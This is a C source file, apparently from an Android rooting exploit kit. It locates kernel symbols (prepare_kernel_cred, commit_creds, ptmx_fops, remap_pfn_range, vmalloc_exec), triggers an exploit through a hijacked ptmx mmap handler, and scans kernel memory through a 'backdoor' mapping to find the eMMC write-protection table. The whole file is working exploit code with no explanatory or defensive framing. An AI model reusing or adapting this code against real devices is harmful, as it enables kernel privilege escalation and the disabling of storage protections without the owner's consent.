static void
register_address(void)
{
#ifdef HAS_SET_SYMBOL_ADDRESS
printf("Essential address are:\n");
if (device_set_symbol_address(DEVICE_SYMBOL(prepare_kernel_cred), (unsigned long int)prepare_kernel_cred)) {
printf(" prepare_kernel_cred = %p\n", prepare_kernel_cred);
}
if (device_set_symbol_address(DEVICE_SYMBOL(commit_creds), (unsigned long int)commit_creds)) {
printf(" commit_creds = %p\n", commit_creds);
}
if (device_set_symbol_address(DEVICE_SYMBOL(remap_pfn_range), (unsigned long int)remap_pfn_range)) {
printf(" remap_pfn_range = %p\n", remap_pfn_range);
}
if (device_set_symbol_address(DEVICE_SYMBOL(vmalloc_exec), (unsigned long int)vmalloc_exec)) {
printf(" vmalloc_exec = %p\n", vmalloc_exec);
}
if (device_set_symbol_address(DEVICE_SYMBOL(ptmx_fops), (unsigned long int)ptmx_fops)) {
printf(" ptmx_fops = %p\n", ptmx_fops);
}
#endif /* HAS_SET_SYMBOL_ADDRESS */
}
static bool
setup_param_from_database(void)
{
int i;
if (mmc_protect_part) {
if (mmc_protect_part_type == MMC_PROTECT_PART_TYPE1
|| mmc_protect_part_type == MMC_PROTECT_PART_TYPE2
|| mmc_protect_part_type == MMC_PROTECT_PART_TYPE3) {
return true;
}
}
mmc_protect_part = device_get_symbol_address(DEVICE_SYMBOL(mmc_protect_part));
if (!mmc_protect_part) {
detect_mmc_protect();
mmc_protect_part = device_get_symbol_address(DEVICE_SYMBOL(mmc_protect_part));
}
mmc_protect_part_type = device_get_symbol_address(DEVICE_SYMBOL(mmc_protect.part_type));
if (mmc_protect_part) {
if (mmc_protect_part_type == MMC_PROTECT_PART_TYPE1
|| mmc_protect_part_type == MMC_PROTECT_PART_TYPE2
|| mmc_protect_part_type == MMC_PROTECT_PART_TYPE3) {
return true;
}
}
mmc_protect_part = 0;
mmc_protect_part_type = MMC_PROTECT_PART_TYPE_UNKNOWN;
return false;
}
static bool
get_creds_functions_addresses(void **prepare_kernel_cred_address, void **commit_creds_address)
{
*prepare_kernel_cred_address = (void *)device_get_symbol_address(DEVICE_SYMBOL(prepare_kernel_cred));
*commit_creds_address = (void*)device_get_symbol_address(DEVICE_SYMBOL(commit_creds));
if (*prepare_kernel_cred_address && *commit_creds_address) {
return true;
}
print_reason_device_not_supported();
return false;
}
static void *
get_delayed_rsp_id_addresses(void)
{
void *value;
value = (void *)device_get_symbol_address(DEVICE_SYMBOL(delayed_rsp_id));
if (value) {
return value;
}
print_reason_device_not_supported();
return NULL;
}
bool
setup_remap_pfn_range_address(void)
{
if (remap_pfn_range) {
return true;
}
remap_pfn_range = (void *)device_get_symbol_address(DEVICE_SYMBOL(remap_pfn_range));
if (!remap_pfn_range && kallsyms_exist()) {
remap_pfn_range = kallsyms_get_symbol_address("remap_pfn_range");
}
return !!remap_pfn_range;
}
bool
setup_vmalloc_exec_address(void)
{
if (vmalloc_exec) {
return true;
}
vmalloc_exec = (void *)device_get_symbol_address(DEVICE_SYMBOL(vmalloc_exec));
if (!vmalloc_exec && kallsyms_exist()) {
vmalloc_exec = (void *)kallsyms_get_symbol_address("vmalloc_exec");
}
return !!vmalloc_exec;
}
static unsigned long int
get_kernel_physical_offset(void)
{
unsigned long int offset;
offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset));
if (!offset) {
offset = find_kernel_text_from_iomem();
}
if (offset) {
return offset;
}
return default_kernel_physical_offset;
}
static unsigned long int
get_ptmx_fops_address(void)
{
unsigned long int address;
address = device_get_symbol_address(DEVICE_SYMBOL(ptmx_fops));
if (address) {
return address;
}
if (kallsyms_exist()) {
address = kallsyms_get_symbol_address("ptmx_fops");
if (address) {
return address;
}
}
return 0;
}
static bool
setup_variables(void)
{
kernel_physical_offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset));
if (kernel_physical_offset) {
return true;
}
kernel_physical_offset = find_kernel_text_from_iomem();
if (kernel_physical_offset) {
return true;
}
kernel_physical_offset = find_kernel_text_from_config();
if (kernel_physical_offset) {
return true;
}
print_reason_device_not_supported();
return false;
}
bool
run_with_mmap(memory_callback_t callback)
{
unsigned long int kernel_physical_offset;
bool result;
if (run_exploit_mmap(callback, &result)) {
return result;
}
setup_remap_pfn_range_address();
if (!remap_pfn_range) {
printf("You need to manage to get remap_pfn_range addresses.\n");
return false;
}
setup_ptmx_fops_mmap_address();
if (!ptmx_fops_mmap_address) {
printf("You need to manage to get ptmx_fops addresses.\n");
return false;
}
kernel_physical_offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset));
if (kernel_physical_offset) {
set_kernel_phys_offset(kernel_physical_offset - 0x00008000);
}
else if (!detect_kernel_phys_parameters()) {
printf("You need to manage to get kernel_physical_offset addresses.\n");
return false;
}
return attempt_exploit(ptmx_fops_mmap_address,
(unsigned long int)&ptmx_mmap, 0,
run_callback_with_mmap, callback);
}
static bool
detect_mmc_protect(void)
{
typedef struct {
mmc_protect_part_type_t type;
const struct mmc_protect_inf *inf;
int num;
} check_t;
check_t check[] = {
{ MMC_PROTECT_PART_TYPE1, check_mmc_protect_part_type1, n_mmc_protect_part_type1 },
{ MMC_PROTECT_PART_TYPE2, check_mmc_protect_part_type2, n_mmc_protect_part_type2 },
{ MMC_PROTECT_PART_TYPE3, check_mmc_protect_part_type3, n_mmc_protect_part_type3 },
};
kallsyms *info;
unsigned long int addr;
const struct mmc_protect_inf *p;
bool ret = false;
int i;
info = kallsyms_in_memory_init((void *)BACKDOOR_MMAP_ADDRESS, BACKDOOR_MMAP_SIZE);
if (info == NULL) {
printf("kallsyms_in_memory_init(): failed\n");
return false;
}
addr = kallsyms_in_memory_lookup_name(info, "mmc_protect_part");
if (!addr) {
goto error_exit;
}
printf("Found: mmc_protect_part = 0x%08x\n", addr);
p = backdoor_convert_to_mmaped_address((void *)addr);
if (p[0].partition == 0) {
p++;
}
for (i = 0; i < ARRAY_SIZE(check); i++) {
int n;
for (n = 0; n < check[i].num; n++) {
if (p[n].partition != check[i].inf[n].partition) {
break;
}
if (p[n].protect & ~(MMC_PROTECT_READ | MMC_PROTECT_WRITE)) {
break;
}
}
if (n == check[i].num) {
printf("Detect partition type: %d\n", check[i].type);
for (n = 0; n < check[i].num; n++) {
printf("#%d: partiton %2d: protect %d\n", n, p[n].partition, p[n].protect);
}
device_set_symbol_address(DEVICE_SYMBOL(mmc_protect_part), addr);
device_set_symbol_address(DEVICE_SYMBOL(mmc_protect.part_type), check[i].type);
ret = true;
break;
}
}
error_exit:
kallsyms_in_memory_free(info);
return ret;
}
